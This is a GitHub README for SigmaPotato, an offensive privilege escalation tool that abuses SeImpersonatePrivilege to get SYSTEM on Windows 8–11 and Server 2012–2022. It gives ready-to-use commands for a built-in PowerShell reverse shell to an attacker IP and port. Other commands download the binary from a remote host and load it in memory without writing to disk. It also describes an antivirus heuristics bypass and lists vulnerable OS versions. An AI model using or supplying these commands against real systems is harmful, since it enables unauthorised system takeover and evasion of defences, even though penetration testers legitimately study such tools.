Skip to content

SeImpersonate privilege escalation tool for Windows 8 - 11 and Windows Server 2012 - 2022 with extensive PowerShell and .NET reflection support.

License

Notifications You must be signed in to change notification settings

xcalibure2/SigmaPotato

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

This gaudy repository is a derivative of the GodPotato project, aiming to enhance the original work's functionality and user-friendliness. With my bread-and-butter generally being PowerShell implementation and visual formatting, the primary focus is on enhancing PowerShell support and output verbosity for a more intuitive and effective user experience.

Banner

Table of Contents

  1. Added Functionality over the Original GodPotato
  2. General Usage
  3. Windows OS Version Compatibility
  4. Credits & Thanks
  5. License

Added Functionality over the Original GodPotato

v1.0.0

[+] Support for execution from memory via .NET reflection.
    o (allows privilege escalation without writing a binary to disk)
    o (help page includes syntax for both local and remote reflection)
	
[+] Built in reverse shell functionality using '--revshell'.
    o (reverse shell is a custom PowerShell-based payload)
	
[+] Bypassed the 1024 max character limit when executing PowerShell commands.
    o (accomplished via exploiting process environment block inheritance)
    o (theoretical character limit: 32,767)
	
[+] Streamlined tool usage by utilizing implied variables over specified variables.
    o (e.g., no more needing to specifiy the '-cmd' parameter)
	
[+] Enhanced visual formatting of PowerShell process output.
    o (e.g., voiding PowerShell's serialization format "#< CLIXML")
	
[+] Increased output verbosity and visual formatting.
    o (error output verbosity by including suggestions for common error messages)
    o (process outputting and usage help vastly improved)

v1.2.5

[+] Streamlined usage when using .NET reflection.
    o (e.g., can now be executed via "[SigmaPotato]::Main('<command>')")
    
[+] Improved reverse shell stability and verbosity.
    o (better error correction and now intercepts console data streams)
    
[+] Further refined visual formatting.
    o (cleaned up help message, hints, and general output)
    

v1.2.6

[+] Added rudimentary AV heuristics bypass by calling an uncommon API.
    o (calling 'VirtualAllocExNuma()' should fail when being analyzed by heuristics engines)
    o (will still likely get caught by most up-to-date Windows Defender w/ Real-time protection)
    
[+] Cleaned up '--help' message.
    o (minor tweaks and spacing)

Work-in-Progress (WIP)

[+] Introduce '--interactive' process support.
    o (this will require 'SeAssignPrimaryTokenPrivilege')
    
[+] Save process output to exported environment variable.
    o (save output of the execute process/command to "$env:SigmaOutput")
    o (will likely only be applicable when using reflection) 

Return to Table of Contents

General Usage

Requirements:

Run as a user with 'SeImpersonatePrivilege' (or 'SeAssignPrimaryTokenPrivilege') user rights.

Checking the help message with --help

Help

Return to Table of Contents

Usage from Disk via the Binary

The easiest way to use SigmaPotato is by interacting with the binary like you would any other program.

# Execute a Command
./SigmaPotato.exe <command>


# Establish a PowerShell Reverse Shell
./SigmaPotato.exe --revshell <ip_addr> <port>


# Return Help Information
./SigmaPotato.exe --help

Return to Table of Contents

Usage from Memory via .NET Reflection

Prior to privilege escalation, we need to load SigmaPotato into memory using .NET reflection.

# Load from a Local Binary already on Disk
[System.Reflection.Assembly]::LoadFile("$PWD/SigmaPotato.exe")


# Load from a Remotely Hosted Binary via a WebClient
$WebClient = New-Object System.Net.WebClient
$DownloadData = $WebClient.DownloadData("http(s):https://<ip_addr>/SigmaPotato.exe")
[System.Reflection.Assembly]::Load($DownloadData)


# Load from a Remotely Hosted Binary via a WebClient (one-liner)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s):https://<ip_addr>/SigmaPotato.exe"))
  • Note: running a simple HTTP server is sufficient for hosting (e.g., python -m http.server 80)

Once the SigmaPotato namespace has been loaded into the current session, you can use it for privilege escalation.

# Execute a Command
[SigmaPotato]::Main("<command>")


# Establish a PowerShell Reverse Shell
$RevShell = @("--revshell", "<ip_addr>", "<port>")
[SigmaPotato]::Main($RevShell)


# Establish a PowerShell Reverse Shell (one-liner)
[SigmaPotato]::Main(@("--revshell","<ip_address>","<port>"))
  • Note: as of v1.2.5, execution no longer requires [SigmaPotato.Program]

Return to Table of Contents

Error Correction

I made an active effort to document the majority of errors I came accross. Hopefully this effort allows any error you come across to be quickly diagnosed.

General Usage Corrections

PS C:\Users\JoeSchmoe> .\SigmaPotato.exe
[-] No arguments detected.  Use '--help' for usage information.


PS C:\Users\JoeSchmoe> .\SigmaPotato.exe cmd.exe /c whoami
[-] Unexpected arguments detected.  Use '--help' for usage information.
 o  (Hint: you might need to wrap your arguments in quotations)


PS C:\Users\JoeSchmoe> .\SigmaPotato.exe --revshell
[-] Reverse shell functionality is missing arguments.  Use '--help' for usage information.
 o  (Hint: you need to specify an IP address and port)

Invalid Filename (or Filename not in the Default Path)

Invalid Filename

Command Exceeds the Character Limit

(Note: this error wouldn't occur if the command was prefaced with "powershell")

Command Too Long

User does not have 'SeImpersonatePrivilege' (or 'SeAssignPrimaryTokenPrivilege') User Rights

Invalid Privileges

Return to Table of Contents

Examples

Below are two examples of SigmaPotato.exe usage.

  1. Simple Example: Using --revshell functionality when using the binary.
  2. Advanced Example: Using .NET reflection and a custom SSL PowerShell reverse shell payload that exceeds the 1024 character limit. The custom reverse shell was created using the Get-RevShell script from my PoorMansArmory repository.

Simple Example:

Binary --revshell

Advanced Example:

Reflection w/ Custom Payload

Return to Table of Contents

Windows OS Version Compatibility

For this project I compiled two different binaries for maximum compatibility. The default SigmaPotato.exe has been tested and validated on a fresh installation of every Windows operating system, from Windows 8/8.1 to Windows 11 and Windows Server 2012 to Windows Server 2019. The only "issue" with this binary is that .NET reflection does not work with PowerShell Core.

The separate SigmaPotatoCore.exe was compiled with .NET Framework v2.0 and supports .NET reflection on PowerShell Core / .NET Core. The downside is that this binary then requires .NET Framework v3.5 (2.0 + 3.0) to be installed on the target system to work via normal binary execution. So if you plan to only use reflection, this version would be optimal.

TL;DR

Version Compiled w/ Binary Compatibility Reflection Compatibility
SigmaPotato.exe .NET Framework: v4.8 .NET Framework: Any .NET Framework: Any (Non-Core)
SigmaPotatoCore.exe .NET Framework: v2.0 .NET Framework: v3.5 .NET Framework: Any
Vulnerable Windows Versions
Windows 8/8.1 - Windows 11
Windows Server 2012 - Windows 2022

Return to Table of Contents

Credits & Thanks

  • Enormous credit to @BeichenDream for the original GodPotato project. I couldn't have made any of this without his hard work.

  • Huge shoutout to @NukingDragons for being way smarter than me and helping with the local environment block bootstrap.

Return to Table of Contents


License

About

SeImpersonate privilege escalation tool for Windows 8 - 11 and Windows Server 2012 - 2022 with extensive PowerShell and .NET reflection support.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C# 74.9%
  • PowerShell 25.1%